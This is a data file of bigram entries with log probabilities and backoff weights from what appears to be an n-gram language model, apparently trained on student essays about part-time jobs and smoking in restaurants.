-0.6832746 manageable as -0.048957378
-1.4711914 Working as -0.048957378
-1.4094145 far as -0.048957378
-1.8661804 things as -0.048957378
-1.2533867 serve as -0.048957378
-1.6929319 days as -0.048957378
-1.1388383 soon as -0.048957378
-1.1388383 -- as -0.048957378
-0.6832746 serves as -0.048957378
-0.97339207 socially as -0.048957378
-1.3448838 together as -0.048957378
-1.1388383 expensive as -0.048957378
-1.1388383 off as -0.048957378
-1.1388383 graduating as -0.048957378
-0.97339207 seen as -0.048957378
-1.2533867 finally as -0.048957378
-0.6832746 mocked as -0.048957378
-0.97339207 hobbies as -0.048957378
-1.7874773 health as -0.048957378
-0.6832746 decisions as -0.048957378
-0.6832746 open as -0.048957378
-0.97339207 nightclubs as -0.048957378
-0.6832746 else as -0.048957378
-1.3448838 smokers as -0.048957378
-3.3047535 a waiter -0.048957378
-2.4042459 a restaurant -0.1647075
-2.5283554 the restaurant -0.04895735
-3.1476786 of restaurant -0.048957378
-2.6941473 on restaurant -0.048957378
-1.9132066 those restaurant -0.048957378
-0.69354665 fast-food restaurant -0.048957378
-0.69354665 Exposing restaurant -0.048957378
-2.7708678 <s> Moreover -0.27955192
-1.2862043 While there -0.048957378
-2.8053942 that there -0.048957378
-1.91234 , there -0.25144583
-2.5822704 and there -0.048957378
-2.6069639 as there -0.048957378
-2.1780512 work there -0.048957378
-2.048471 then there -0.048957378
-1.5688267 but there -0.048957378
-1.1638237 However there -0.048957378
-2.275442 when there -0.048957378
-2.0463448 If there -0.048957378
-1.1638237 Firstly there -0.048957378
-1.5228355 feel there -0.048957378
-2.0020888 than there -0.048957378
-1.3805711 though there -0.048957378
-1.2862043 Perhaps there -0.048957378
-1.8917471 think there -0.048957378
-0.6918643 driving there -0.048957378
-0.6918643 served there -0.048957378
-2.106229 having ample -0.048957378
-3.120598 is ample -0.048957378
-1.855274 this reason -0.11268411
-3.042853 the reason -0.048957378
-0.99169886 ample reason -0.048957378
-2.1945517 only reason -0.048957378
-1.2889621 Another reason -0.187397
-2.3340702 important reason -0.048957378
-1.4602048 first reason -0.50140065
-2.048765 good reason -0.048957378
-1.9400582 other reason -0.048957378
-1.6335956 main reason -0.048957378
-1.3554904 no reason -0.187397
-1.5288866 second reason -0.048957378
-1.1659027 significant reason -0.048957378
-1.1659027 obvious reason -0.048957378
-1.4019599 for students -0.36923593
-1.3307923 that students -0.100717194
-2.3124604 a students -0.048957378
-1.756902 the students -0.16328607
-1.5387614 , students -0.12614639
-1.2284902 many students -0.09038658
-2.232715 and students -0.048957378
-2.03171 of students -0.048957378
-2.2857842 to students -0.048957378
-2.20754 from students -0.048957378
-2.222474 working students -0.048957378
-2.307907 as students -0.048957378
-1.8347775 reason students -0.048957378
-2.321427 on students -0.048957378
-2.0178638 The students -0.048957378
-2.347648 time students -0.048957378
-2.0649054 school students -0.048957378
-1.6545906 if students -0.048957378
-2.030902 such students -0.048957378
-1.973532 -RRB- students -0.048957378
-0.61004657 college students -0.42267904
-1.0082663 some students -0.09038658
-1.0149802 most students -0.09038658
-1.3382854 Most students -0.048957378
-1.5629534 benefit students -0.048957378
-1.2962623 ; students -0.048957378
-2.070681 more students -0.048957378
-0.99064183 helps students -0.187397
-2.230422 at students -0.048957378
-1.1539278 Many students -0.048957378
-0.6715578 gives students -0.04895735
-1.0388963 College students -0.15838256
-0.96314585 help students -0.048957378
-2.1083074 when students -0.048957378
-2.0365932 what students -0.048957378
-1.3382854 encourage students -0.048957378
-1.3067409 all students -0.20946135
-1.1615238 Japanese students -0.048957378
-1.5123903 therefore students -0.048957378
-1.3183289 provide students -0.187397
-1.8779378 If students -0.048957378
-1.5123903 teach students -0.048957378
-1.0831242 give students -0.04895735
-0.37547976 fellow students -0.13618872
-1.8364648 believe students -0.048957378
-0.6828633 recently-graduated students -0.048957378
-0.8165399 university students -0.11268411
-1.7050076 A students -0.048957378
-2.0056694 which students -0.048957378
-1.9798762 these students -0.048957378
-1.137665 allowing students -0.048957378
-0.6828633 encourages students -0.048957378
-1.4120058 provides students -0.048957378
-1.0780463 where students -0.04895735
-0.4049682 expose students -0.048957378
-1.2518599 requires students -0.048957378
-1.4688417 feel students -0.187397
-0.4735685 allows students -0.11268411
-1.4641747 So students -0.048957378
-1.8527665 than students -0.048957378
-1.4688417 Some students -0.048957378
-1.5713763 possible students -0.048957378
-1.8039696 years students -0.048957378
-1.4072294 poor students -0.048957378
-1.3382854 allow students -0.048957378
-0.9771071 young students -0.048957378
-1.137665 enables students -0.048957378
-1.3523244 teaches students -0.048957378
-1.721344 want students -0.048957378
-1.5584444 why students -0.048957378
-0.6828633 8,000 students -0.048957378
-1.4072294 few students -0.048957378
-1.2518599 current students -0.048957378
-0.8715577 assist students -0.048957378
-0.9725902 Otherwise students -0.048957378
-1.137665 busy students -0.048957378
-0.9725902 unproductive students -0.048957378
-1.137665 off students -0.048957378
-0.9725902 brings students -0.048957378
-0.6828633 irresponsible students -0.048957378
-0.6828633 pushing students -0.048957378
-0.6828633 needy students -0.048957378
-0.6828633 inspire students -0.048957378
-0.9725902 spoiled students -0.048957378
-2.7556913 not engage -0.048957378
-2.90557 to engage -0.187397
-1.9188446 They engage -0.048957378
-2.0134587 <s> Such -0.12570384
-2.0510054 often mean -0.048957378
-2.4158804 also mean -0.048957378
-2.7187858 with considerable -0.048957378
-3.2649243 a considerable -0.048957378
-1.5948578 meet considerable -0.048957378
-2.8272688 the amount -0.187397
-1.16925 considerable amount -0.048957378
-1.2934115 small amount -0.187397
-1.16925 significant amount -0.048957378
-1.5913469 large amount -0.048957378
-0.69368714 budgeted amount -0.048957378
-2.6128922 student additional -0.048957378
-3.1699133 of additional -0.048957378
-2.7018807 on additional -0.048957378
-2.4390335 an additional -0.048957378
-2.7526727 have additional -0.048957378
-1.2934115 requires additional -0.048957378
-1.4689857 additional stress -0.048957378
-2.3479426 The stress -0.048957378
-1.16925 cause stress -0.048957378
-1.4679527 added stress -0.048957378
-1.16925 causes stress -0.048957378
-0.9939372 creates stress -0.048957378
-2.0174937 it on -0.04895735
-2.253122 be on -0.048957378
-2.0092933 job on -0.04895735
-2.2296135 , on -0.20946135
-2.2493231 not on -0.048957378
-2.3469317 and on -0.048957378
-1.9975538 has on -0.048957378
-1.413362 stress on -0.048957378
-1.7530437 less on -0.048957378
-2.3546855 time on -0.048957378
-0.7099427 focus on -0.28567907
-0.9731246 effectively on -0.048957378
-2.0464685 work on -0.048957378
-1.8919449 -LRB- on -0.048957378
-2.2467754 money on -0.048957378
-2.036208 so on -0.048957378
-0.9731246 guarantee on -0.048957378
-2.1857195 or on -0.048957378
-1.9111866 even on -0.048957378
-2.2686563 are on -0.048957378
-2.0765378 more on -0.048957378
-0.5434636 taking on -0.048957378
-1.9297018 spend on -0.048957378
-0.6831375 strains on -0.048957378
-1.408685 effort on -0.048957378
-1.6137459 something on -0.048957378
-1.8110754 take on -0.048957378
-1.7904631 classes on -0.048957378
-1.8622386 activities on -0.048957378
-1.1384469 strongly on -0.048957378
-1.9392554 up on -0.048957378
-0.9731246 depends on -0.048957378
-1.8099428 going on -0.048957378
-1.917756 out on -0.048957378
-0.54891545 impact on -0.13618872
-0.9731246 determination on -0.048957378
-0.2700946 based on -0.048957378
-1.5730753 possible on -0.048957378
-0.40507883 relying on -0.187397
-1.596889 worked on -0.048957378
-1.344314 back on -0.048957378
-0.7942637 concentrate on -0.048957378
-0.6831375 role on -0.048957378
-1.1434696 participation on -0.048957378
-0.8705654 effect on -0.048957378
-1.413362 takes on -0.187397
-1.794955 think on -0.048957378
-0.47110486 focused on -0.04895735
-0.57823205 moving on -0.048957378
-0.9731246 dependent on -0.048957378
-0.9731246 completed on -0.048957378
-1.2528772 build on -0.048957378
-1.344314 early on -0.048957378
-0.9731246 % on -0.048957378
-0.6831375 cheaper on -0.048957378
-0.6831375 strictly on -0.048957378
-0.7002525 concentration on -0.048957378
-0.2520104 rely on -0.04895735
-0.2520104 concentrating on -0.27955192
-0.9731246 influence on -0.048957378
-0.6831375 Depending on -0.048957378
-0.6831375 priority on -0.048957378
-0.6831375 action on -0.048957378
-1.339527 invaluable on -0.048957378
-1.039454 spent on -0.048957378
-1.344314 public on -0.048957378
-1.2528772 purely on -0.048957378
-0.6831375 Or on -0.048957378
-1.1384469 expense on -0.048957378
-0.6831375 strain on -0.048957378
-0.9731246 pressure on -0.187397
-1.1384469 difficulties on -0.048957378
-0.40507883 hands on -0.187397
-0.6831375 Based on -0.187397
-1.2528772 groups on -0.048957378
-0.6831375 lounging on -0.048957378
-0.6831375 depend on -0.048957378
-0.6831375 Queens on -0.048957378
-0.6831375 influences on -0.048957378
-0.3484125 ban on -0.1722646
-0.40507883 restrictions on -0.048957378
-0.6831375 severe on -0.048957378
-3.4000094 the top -0.048957378
-2.1578155 on top -0.187397
-3.0178597 that created -0.048957378
-2.8775895 for studies -0.048957378
-2.7371416 the studies -0.048957378
-3.01755 of studies -0.048957378
-1.3222532 their studies -0.24477966
-1.9955268 from studies -0.048957378
-2.1321971 on studies -0.048957378
-2.016018 's studies -0.13618872
-1.8961413 academic studies -0.048957378
-1.8040662 my studies -0.048957378
-1.384001 University studies -0.048957378
-1.939229 our studies -0.048957378
-1.4599779 his studies -0.048957378
-1.3848785 daily studies -0.048957378
-1.3848785 tertiary studies -0.048957378
-1.2027681 <s> The -0.12879533
-1.8006662 I also -0.04895735
-2.5483181 it also -0.048957378
-1.1931207 can also -0.07613316
-2.421837 part-time also -0.048957378
-2.1256256 job also -0.04895735
-1.687835 is also -0.14477092
-1.7873261 will also -0.13618872
-2.9581296 , also -0.048957378
-2.7188857 and also -0.048957378
-2.2683425 also also -0.048957378
-2.5948405 time also -0.048957378
-2.3574555 jobs also -0.048957378
-2.2836058 may also -0.048957378
-1.0426338 but also -0.04895735
-1.9413786 should also -0.187397
-2.6309447 they also -0.048957378
-1.9729319 's also -0.048957378
-1.8676002 ; also -0.048957378
-2.3226044 people also -0.048957378
-1.8593925 They also -0.048957378
-1.2801979 fre also -0.048957378
-2.0210266 while also -0.048957378
-1.2801979 fll also -0.048957378
-1.5740396 could also -0.048957378
-1.9875935 must also -0.048957378
-1.8366562 It also -0.048957378
-2.2427747 fs also -0.048957378
-1.7291627 would also -0.048957378
-1.6547388 Students also -0.048957378
-1.5113788 us also -0.048957378
-2.3119407 be increased -0.048957378
-3.0543673 a less -0.048957378
-2.506663 is less -0.048957378
-2.6443284 and less -0.04895735
-3.1719224 to less -0.048957378
-2.6559741 as less -0.048957378
-1.822755 focus less -0.048957378
-2.1929817 have less -0.048957378
-1.988769 doing less -0.048957378
-1.4629681 usually less -0.048957378
-2.088065 much less -0.048957378
-1.4629681 far less -0.048957378
-2.027863 smoke less -0.048957378
-2.1932259 this time -0.048957378
-2.2431653 a time -0.1722646
-1.7900798 the time -0.106249355
-2.1072464 , time -0.09038658
-1.8870753 of time -0.07613316
-2.693594 to time -0.048957378
-1.441317 their time -0.04895735
-1.0931581 study time -0.099168696
-0.9806769 ample time -0.048957378
-1.7774608 on time -0.13618872
-1.2841984 less time -0.048957378
-0.7714597 available time -0.04895735
-2.4307246 have time -0.187397
-0.9148412 extra time -0.04895735
-2.1108239 some time -0.048957378
-1.2673745 - time -0.048957378
-2.3086903 or time -0.048957378
-0.22725546 part time -0.74411327
-1.1486357 more time -0.099168696
-1.7469848 important time -0.187397
-1.5856681 same time -0.23812707
-1.9231375 first time -0.04895735
-1.379641 enough time -0.187397
-0.73934513 spend time -0.0796529
-1.9613218 This time -0.048957378
-1.7547461 your time -0.048957378
-1.8602109 take time -0.048957378
-1.7376593 fs time -0.11268411
-1.3317025 no time -0.048957378
-1.4897636 quite time -0.048957378
-1.78098 find time -0.048957378
-0.32378548 full time -0.048957378
-0.70379233 limited time -0.048957378
-1.2673745 requires time -0.048957378
-0.8760494 free time -0.048957378
-1.3572918 manage time -0.048957378
-1.9732132 much time -0.048957378
-2.170744 my time -0.048957378
-1.2673745 short time -0.048957378
-0.8760494 takes time -0.048957378
-0.68699443 Part time -0.20946135
-1.4961216 waste time -0.048957378
-1.1495428 easier time -0.048957378
-1.92054 his time -0.048957378
-0.68699443 arranging time -0.048957378
-0.9806769 excellent time -0.048957378
-1.2673745 using time -0.048957378
-1.2673745 over time -0.048957378
-0.68699443 special time -0.048957378
-0.40663064 transitional time -0.048957378
-0.68699443 opportune time -0.048957378
-0.68699443 in-class time -0.048957378
-0.9806769 reasonable time -0.048957378
-0.68699443 His time -0.048957378
-2.9718654 is available -0.048957378
-3.1340673 the available -0.048957378
-2.080413 any available -0.048957378
-2.8794727 their available -0.048957378
-1.8775834 little available -0.048957378
-2.2197218 time available -0.187397
-2.4608476 jobs available -0.048957378
-2.3679307 more available -0.048957378
-2.3488793 fs available -0.048957378
-1.1675731 Jobs available -0.048957378
-2.596728 to accomplish -0.04895735
-3.09512 <s> Additionally -0.187397
-0.5181642 part-time jobs -0.23893401
-1.6560253 full-time jobs -0.048957378
-2.2445977 many jobs -0.048957378
-2.0278883 any jobs -0.048957378
-2.7948785 in jobs -0.048957378
-2.5436628 of jobs -0.048957378
-2.063378 their jobs -0.04895735
-2.2222443 The jobs -0.048957378
-1.6877759 time jobs -0.24943376
-1.669731 available jobs -0.048957378
-1.5665365 f jobs -0.048957378
-2.1343203 such jobs -0.048957378
-2.069751 most jobs -0.048957378
-2.5768034 are jobs -0.048957378
-1.3737917 Part-time jobs -0.099168696
-2.2605467 part jobs -0.048957378
-1.9802302 first jobs -0.048957378
-1.9060905 other jobs -0.048957378
-2.1893034 what jobs -0.048957378
-2.316782 all jobs -0.048957378
-1.7624514 real jobs -0.048957378
-2.1844375 get jobs -0.048957378
-1.5682971 graduate jobs -0.048957378
-1.3737917 basic jobs -0.048957378
-0.69046736 Student jobs -0.048957378
-0.69046736 Real-world jobs -0.048957378
-1.1596954 regular jobs -0.048957378
-0.69046736 offering jobs -0.048957378
-0.69046736 low-skilled jobs -0.048957378
-2.6886988 can leave -0.048957378
-2.8944666 to leave -0.048957378
-2.831353 they leave -0.048957378
-1.7066134 we leave -0.048957378
-2.4945273 with one -0.048957378
-2.0841045 for one -0.13618872
-2.5183668 be one -0.048957378
-2.679537 that one -0.048957378
-2.050633 having one -0.048957378
-2.4114535 part-time one -0.048957378
-2.3998318 is one -0.048957378
-2.7534437 the one -0.048957378
-2.4952023 , one -0.04895735
-2.7540843 in one -0.048957378
-2.1237957 of one -0.187397
-2.8597465 to one -0.048957378
-2.5175261 as one -0.048957378
-2.5249085 on one -0.048957378
-2.2507303 also one -0.048957378
-1.4451655 leave one -0.048957378
-2.2078345 if one -0.048957378
-1.4451655 pursuing one -0.048957378
-2.5675447 college one -0.048957378
-2.4022777 money one -0.048957378
-1.780973 : one -0.048957378
-1.5097663 does one -0.048957378
-2.254753 do one -0.048957378
-1.8758186 no one -0.048957378
-1.9663883 make one -0.048957378
-1.3728908 during one -0.187397
-1.9494588 where one -0.048957378
-1.5613256 perhaps one -0.048957378
-1.9475634 things one -0.048957378
-0.6897705 cloud one -0.048957378
-1.1576457 Reason one -0.048957378
-0.6897705 complement one -0.048957378
-0.6897705 complements one -0.048957378
-0.6897705 perfected one -0.048957378
-3.3971481 , tired -0.048957378
-2.2791026 one tired -0.048957378
-1.8616352 being tired -0.048957378
-2.2770538 so tired -0.048957378
-0.6938276 physically tired -0.048957378
-3.2799814 and thus -0.048957378
-0.6942267 horizons thus -0.048957378
-1.8347663 cases unable -0.048957378
-3.2102208 and unable -0.048957378
-1.1700908 thus unable -0.048957378
-2.8669279 are unable -0.048957378
-2.7912447 the focus -0.048957378
-3.0629127 and focus -0.048957378
-3.1063578 of focus -0.048957378
-2.059188 to focus -0.13332285
-2.8945246 their focus -0.048957378
-1.6463084 should focus -0.40449065
-1.5885828 today focus -0.048957378
-1.4654533 colleges focus -0.048957378
-2.0975585 much focus -0.048957378
-1.8378968 focus effectively -0.048957378
-1.4711709 tasks effectively -0.048957378
-2.5736907 it ? -0.048957378
-2.5631618 job ? -0.048957378
-2.821331 in ? -0.048957378
-2.3400064 experience ? -0.048957378
-2.336049 students ? -0.187397
-2.1402833 studies ? -0.048957378
-2.6202376 time ? -0.048957378
-2.4346166 money ? -0.048957378
-2.2894611 skills ? -0.048957378
-2.1795027 education ? -0.048957378
-2.078757 world ? -0.048957378
-0.69088596 subjective ? -0.048957378
-0.9883628 straightforward ? -0.048957378
-1.7010977 lives ? -0.048957378
-1.8239864 Japan ? -0.048957378
-1.5150883 generally ? -0.048957378
-1.5166876 anything ? -0.048957378
-1.2840103 resources ? -0.048957378
-1.2823725 stage ? -0.048957378
-0.69088596 authorities ? -0.048957378
-0.69088596 governments ? -0.048957378
-0.69088596 competency ? -0.048957378
-0.9883628 attitude ? -0.048957378
-1.2823725 weekends ? -0.048957378
-0.69088596 bursary ? -0.048957378
-1.2823725 here ? -0.048957378
-3.6294703 <s> resulting -0.048957378
-3.4000094 the resulting -0.048957378
-2.7477093 a lower -0.048957378
-2.5949488 from lower -0.048957378
-2.85306 the quality -0.187397
-1.1700908 lower quality -0.048957378
-2.08053 good quality -0.048957378
-1.469627 poor quality -0.048957378
-2.654057 the school -0.048957378
-2.7735555 , school -0.048957378
-1.6903458 in school -0.19052841
-2.5504224 and school -0.048957378
-2.892758 of school -0.048957378
-2.988369 to school -0.048957378
-2.7202551 their school -0.048957378
-1.6700217 from school -0.13618872
-2.5861301 on school -0.048957378
-2.1608806 only school -0.048957378
-1.3959985 through school -0.187397
-1.4094224 at school -0.11268411
-0.47545445 high school -0.13618872
-1.5450042 after school -0.187397
-1.3775741 during school -0.048957378
-1.2840105 balancing school -0.048957378
-0.8038377 particular school -0.048957378
-1.5178914 quit school -0.048957378
-1.5193118 afford school -0.048957378
-1.9938333 his school -0.048957378
-0.691305 nursery school -0.048957378
-0.691305 cram school -0.048957378
-0.7077454 attending school -0.048957378
-2.3252554 I work -0.048957378
-2.0261102 for work -0.04895735
-1.998533 can work -0.04895735
-2.2296102 that work -0.048957378
-2.3698292 a work -0.048957378
-0.92244244 part-time work -0.0923415
-2.4741051 is work -0.048957378
-1.8940754 valuable work -0.048957378
-1.774281 the work -0.3101605
-2.1641345 , work -0.048957378
-2.0179143 not work -0.048957378
-2.155303 and work -0.04895735
-1.9547871 of work -0.09038658
-1.4441775 to work -0.169769
-2.4058778 their work -0.048957378
-1.2534463 course work -0.048957378
-1.7131832 gain work -0.048957378
-2.3646681 as work -0.048957378
-2.5292082 students work -0.048957378
-1.8347353 time work -0.048957378
-1.6581231 school work -0.048957378
-2.058534 such work -0.048957378
-1.9194632 then work -0.048957378
-2.2906883 should work -0.048957378
-2.0232077 only work -0.048957378
-2.430137 college work -0.048957378
-2.4433575 they work -0.048957378
-1.2321298 extra work -0.048957378
-1.6758809 To work -0.048957378
-2.242867 or work -0.048957378
-1.3483186 Part-time work -0.048957378
-1.8967416 future work -0.048957378
-1.8595383 through work -0.048957378
-1.643312 who work -0.187397
-2.274983 at work -0.048957378
-1.8742472 doing work -0.048957378
-1.7066337 real work -0.048957378
-1.527458 therefore work -0.048957378
-1.1439594 menial work -0.048957378
-0.97688437 sufficient work -0.048957378
-1.1481692 prior work -0.048957378
-1.7603195 find work -0.048957378
-1.4776343 either work -0.048957378
-0.68506163 strong work -0.048957378
-1.9408126 much work -0.048957378
-0.6600929 hard work -0.14912641
-0.97688437 definitely work -0.048957378
-1.26419 America work -0.048957378
-1.4776343 generally work -0.048957378
-1.7096123 days work -0.04895735
-1.1439594 gaining work -0.048957378
-0.68506163 processes work -0.048957378
-1.2310314 class work -0.048957378
-0.68506163 Actual work -0.048957378
-1.1439594 hierarchies work -0.048957378
-1.5383855 hand work -0.048957378
-1.8253148 our work -0.048957378
-2.0705028 we work -0.048957378
-1.4776343 her work -0.048957378
-1.26419 respect work -0.048957378
-1.1439594 Balancing work -0.048957378
-1.1439594 regular work -0.048957378
-0.68506163 volunteer work -0.048957378
-0.68506163 Basic work -0.048957378
-0.97688437 Parents work -0.048957378
-0.68506163 semi-regular work -0.048957378
-0.68506163 firm work -0.048957378
-0.68506163 potentially work -0.048957378
-3.2450058 , being -0.048957378
-1.8264728 by being -0.048957378
-2.1737466 of being -0.048957378
-2.5321739 from being -0.048957378
-1.9530969 reason being -0.187397
-2.7130642 work being -0.048957378
-2.091309 even being -0.048957378
-1.586511 benefits being -0.048957378
-1.1671549 subject being -0.048957378
-1.463795 everything being -0.048957378
-0.9925369 remember being -0.048957378
-1.868011 being produced -0.048957378
-2.174259 <s> Therefore -0.5104914
-2.5869553 it if -0.048957378
-2.6021113 be if -0.048957378
-2.076529 that if -0.04895735
-1.862392 , if -0.13332285
-2.5428126 and if -0.187397
-2.1455538 studies if -0.048957378
-2.0347157 -LRB- if -0.048957378
-0.69116527 sought if -0.048957378
-1.7964928 And if -0.048957378
-1.519624 even if -0.048957378
-2.293879 more if -0.048957378
-2.028992 because if -0.048957378
-2.1488059 these if -0.048957378
-1.8033544 customers if -0.048957378
-1.5774821 value if -0.048957378
-1.2849771 decide if -0.048957378
-1.9885925 than if -0.048957378
-1.6198496 But if -0.048957378
-1.2834638 determine if -0.048957378
-1.6271508 later if -0.048957378
-1.2834638 Even if -0.099168696
-0.988917 nice if -0.048957378
-0.69116527 desirable if -0.048957378
-0.988917 household if -0.048957378
-2.7426593 be related -0.048957378
-1.862535 job related -0.50140065
-2.9560866 is related -0.187397
-2.668018 not related -0.048957378
-2.7130642 work related -0.048957378
-2.7644556 are related -0.048957378
-2.4043431 all related -0.048957378
-2.3429112 fs related -0.048957378
-0.5847311 directly related -0.187397
-1.8242902 responsibility related -0.048957378
-2.1247215 smoking related -0.048957378
-3.4614878 <s> f -0.048957378
-2.9123535 students f -0.048957378
-1.5326759 graduates f -0.048957378
-2.1322756 world f -0.048957378
-0.6934062 epeople-skills f -0.048957378
-0.9933765 ereal f -0.048957378
-1.388153 mind f -0.048957378
-0.6934062 etime f -0.048957378
-2.873293 be found -0.048957378
-1.5379899 positions found -0.048957378
-3.1628284 <s> -LRB- -0.048957378
-2.1658301 reasons -LRB- -0.048957378
-2.8508892 a -LRB- -0.048957378
-2.5631618 job -LRB- -0.048957378
-1.5166876 chosen -LRB- -0.048957378
-2.5685596 on -LRB- -0.048957378
-2.1402833 studies -LRB- -0.048957378
-2.6202376 time -LRB- -0.048957378
-2.6028714 work -LRB- -0.048957378
-0.9883628 found -LRB- -0.048957378
-1.4561495 level -LRB- -0.048957378
-1.9418831 enough -LRB- -0.048957378
-2.3302038 all -LRB- -0.048957378
-0.9883628 commitments -LRB- -0.048957378
-1.3774391 debt -LRB- -0.048957378
-1.7959839 income -LRB- -0.048957378
-1.8051797 way -LRB- -0.048957378
-1.5696933 great -LRB- -0.048957378
-1.2823725 co-workers -LRB- -0.048957378
-1.2823725 wanted -LRB- -0.048957378
-0.9883628 boss -LRB- -0.048957378
-0.9883628 applied -LRB- -0.048957378
-0.69088596 Reducing -LRB- -0.048957378
-2.0827832 smoking -LRB- -0.048957378
-1.2823725 rights -LRB- -0.048957378
-0.69088596 alternatively -LRB- -0.048957378
-2.725951 for such -0.048957378
-2.5499542 be such -0.048957378
-2.0572393 having such -0.048957378
-2.7313151 is such -0.048957378
-2.5106988 , such -0.27955192
-2.4391725 in such -0.048957378
-2.7188857 and such -0.048957378
-1.9658114 from such -0.048957378
-2.5396338 as such -0.048957378
-2.3574555 jobs such -0.048957378
-2.0175722 -LRB- such -0.048957378
-2.0770268 but such -0.048957378
-1.3749874 As such -0.048957378
-0.6903279 oriented such -0.048957378
-1.8676002 ; such -0.048957378
-2.265639 more such -0.048957378
-1.7679564 skills such -0.187397
-1.9761689 make such -0.048957378
-0.6903279 counter such -0.048957378
-1.8188589 find such -0.048957378
-2.1308677 learn such -0.048957378
-1.5132132 afford such -0.048957378
-1.661639 age such -0.048957378
-0.9872564 virtues such -0.048957378
-1.1592846 activity such -0.048957378
-0.9872564 establishments such -0.048957378
-0.6903279 obstructs such -0.048957378
-0.6903279 behoove such -0.048957378
-0.6903279 built such -0.048957378
-0.6903279 implementing such -0.048957378
-2.4889135 with an -0.048957378
-2.3471477 for an -0.048957378
-2.1775472 be an -0.048957378
-1.4638371 is an -0.18543062
-2.6945138 , an -0.048957378
-2.4781325 not an -0.048957378
-2.4207144 in an -0.048957378
-2.4668753 and an -0.04895735
-2.7679293 of an -0.048957378
-2.643432 to an -0.048957378
-1.4465187 example an -0.048957378
-2.095947 has an -0.048957378
-2.3968844 from an -0.048957378
-1.2920727 as an -0.13332285
-2.0311358 students an -0.13618872
-2.5197482 on an -0.048957378
-1.2721521 such an -0.04895735
-2.1341379 have an -0.048957378
-1.7793158 : an -0.048957378
-2.5287702 are an -0.048957378
-1.600312 at an -0.04895735
-1.3662472 take an -0.048957378
-2.3043654 them an -0.048957378
-1.3444461 provide an -0.048957378
-2.1658885 get an -0.048957378
-2.0097125 out an -0.048957378
-1.371942 now an -0.048957378
-0.6896313 Consider an -0.048957378
-1.2774949 build an -0.048957378
-0.98587745 play an -0.048957378
-1.5623918 complete an -0.048957378
-1.5128433 choose an -0.048957378
-1.371942 growth an -0.048957378
-1.2796862 creating an -0.048957378
-0.6896313 embraces an -0.048957378
-2.469975 an internship -0.048957378
-2.3044932 this -RRB- -0.048957378
-2.5608191 it -RRB- -0.048957378
-1.9826323 valuable -RRB- -0.048957378
-1.8437781 less -RRB- -0.048957378
-1.5203519 ? -RRB- -0.187397
-0.69060683 internship -RRB- -0.048957378
-1.5198623 fees -RRB- -0.048957378
-1.9741774 future -RRB- -0.048957378
-1.815958 environment -RRB- -0.048957378
-1.9379536 enough -RRB- -0.048957378
-1.8746905 classes -RRB- -0.048957378
-1.7656285 responsibilities -RRB- -0.048957378
-1.1618836 etc. -RRB- -0.048957378
-1.2812839 assignments -RRB- -0.048957378
-1.572441 did -RRB- -0.048957378
-1.2812839 him -RRB- -0.048957378
-1.2193218 ! -RRB- -0.187397
-0.98780924 thing -RRB- -0.048957378
-0.69060683 i -RRB- -0.048957378
-0.69060683 ii -RRB- -0.048957378
-0.98780924 1 -RRB- -0.048957378
-1.1601064 2 -RRB- -0.048957378
-1.1601064 3 -RRB- -0.048957378
-0.69060683 questions -RRB- -0.048957378
-0.69060683 eliminating -RRB- -0.048957378
-0.69060683 bills -RRB- -0.048957378
-0.69060683 renovations -RRB- -0.048957378
-1.1601064 choices -RRB- -0.048957378
-2.665704 job then -0.048957378
-1.8722535 , then -0.06917815
-2.3709912 and then -0.04895735
-2.3089478 study then -0.048957378
-2.3523607 also then -0.048957378
-1.9133708 jobs then -0.048957378
-1.8165324 And then -0.048957378
-2.7391284 are then -0.048957378
-1.5859333 did then -0.048957378
-1.8448267 was then -0.048957378
-0.6927047 affordable then -0.048957378
-1.2895159 Even then -0.048957378
-0.6927047 taken-on then -0.048957378
-1.5218859 this may -0.04895735
-1.6387134 it may -0.1722646
-2.6943552 that may -0.048957378
-2.1205246 job may -0.099168696
-2.4340558 student may -0.048957378
-2.2321982 many may -0.048957378
-2.4863043 and may -0.048957378
-1.830649 experience may -0.13618872
-1.6171387 students may -0.09038658
-2.5826783 time may -0.048957378
-2.348351 jobs may -0.048957378
-2.5655887 work may -0.048957378
-2.0713143 but may -0.048957378
-2.577158 college may -0.048957378
-1.9115219 they may -0.048957378
-2.0510042 or may -0.048957378
-1.7659475 skills may -0.048957378
-2.1819563 who may -0.048957378
-1.7091721 idea may -0.048957378
-1.1584644 again may -0.048957378
-1.8552963 They may -0.048957378
-2.0215673 This may -0.048957378
-2.2618876 do may -0.048957378
-1.9534212 society may -0.048957378
-1.7861421 income may -0.048957378
-2.0295806 much may -0.048957378
-1.7613238 workplace may -0.048957378
-0.9867043 We may -0.048957378
-1.6933241 person may -0.048957378
-0.6900491 agency may -0.048957378
-0.6900491 She may -0.048957378
-1.3717782 employees may -0.048957378
-2.880715 be worth -0.048957378
-0.6938276 worth pursuing -0.048957378
-2.762729 have pursuing -0.048957378
-2.322112 are pursuing -0.048957378
-1.728864 still pursuing -0.048957378
-2.042275 than pursuing -0.048957378
-2.656897 job but -0.048957378
-1.6151335 , but -0.12232355
-2.706777 time but -0.048957378
-2.1904237 work but -0.048957378
-2.1213527 -RRB- but -0.048957378
-2.471992 at but -0.048957378
-0.6925645 situations but -0.048957378
-1.1659027 subjects but -0.048957378
-1.5288866 books but -0.048957378
-0.99169886 dishes but -0.048957378
-1.1659027 -- but -0.048957378
-1.5264108 lose but -0.048957378
-0.6925645 salary but -0.048957378
-1.384001 choice but -0.048957378
-2.165491 but otherwise -0.048957378
-1.7598311 would otherwise -0.048957378
-1.8190807 it should -0.13618872
-2.3087864 that should -0.048957378
-2.4744995 job should -0.048957378
-1.5142306 student should -0.099168696
-1.9393792 employment should -0.048957378
-2.6183295 and should -0.048957378
-2.2061079 study should -0.048957378
-2.1019301 studying should -0.048957378
-1.7482382 restaurant should -0.048957378
-2.0469754 there should -0.048957378
-1.2276503 students should -0.30548838
-2.129624 work should -0.048957378
-2.1115725 such should -0.048957378
-2.5399191 college should -0.048957378
-1.2254425 they should -0.106249355
-2.2786334 people should -0.048957378
-1.8392867 They should -0.048957378
-1.6059982 College should -0.187397
-1.5551537 therefore should -0.048957378
-1.8175535 It should -0.187397
-1.9434342 activities should -0.048957378
-1.7883325 life should -0.187397
-2.1449103 education should -0.048957378
-1.155199 offers should -0.048957378
-1.5046468 universities should -0.048957378
-1.2748088 courses should -0.048957378
-1.6420794 Students should -0.048957378
-1.155199 Jobs should -0.048957378
-0.6889358 sophomores should -0.048957378
-1.5551537 companies should -0.048957378
-1.7202897 he should -0.048957378
-1.1625504 we should -0.048957378
-0.6889358 deviation should -0.048957378
-0.98450285 Parents should -0.048957378
-1.155199 activity should -0.048957378
-0.6889358 Governments should -0.048957378
